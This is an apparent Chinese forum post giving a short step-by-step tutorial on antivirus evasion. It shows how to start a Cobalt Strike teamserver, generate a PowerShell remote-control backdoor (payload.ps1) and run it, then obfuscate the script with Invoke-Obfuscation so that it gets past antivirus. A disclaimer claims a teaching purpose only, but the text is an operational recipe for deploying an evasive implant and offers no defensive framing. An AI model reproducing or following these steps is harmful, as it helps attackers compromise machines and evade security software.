|
|
请勿违法 互联网非法外之地 仅供教学目的没有恶意 管理大大放过我
1:CobaltStrike 服务端准备
启动服务端命令
./teamserver 192.168.1.6 adm1nt1st
2.CobaltStrike 客户端登录并导出 PS 远控
输入服务端 IP 端口密码,用户名随意写
设置监听器
Payload 默认即可,端口尽量别冲突
选择 Payload 后门生成
生成 PowerShell
运行保存在桌面的 payload.ps1,在杀软全程开启的情况下直接上线(易翻车,运气好)
3.编码混淆
PowerShell 的免杀可以用 Invoke-Obfuscation,Invoke-Obfuscation 主要是对 ps1 脚本进行免杀,需要现有一个 ps 的payload。
进入 Invoke-Obfuscation 目录后,在 PowerShell 中执行命令
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation
然后执行命令,指定待处理的 Ps1 文件
set scriptpath c:\xxx\payload.ps1
或者指定待处理的 ps 代码
set scriptblock 'echo xss'
输入 encoding 并选择编码方式,比如 1
输入命令,导出免杀 ps 文件到指定路径
out C:\xxx\xxx.ps1
运行上线,至此,简单免杀制作完成。
通过通过 |
|
发表于 2022-5-8 15:09:22
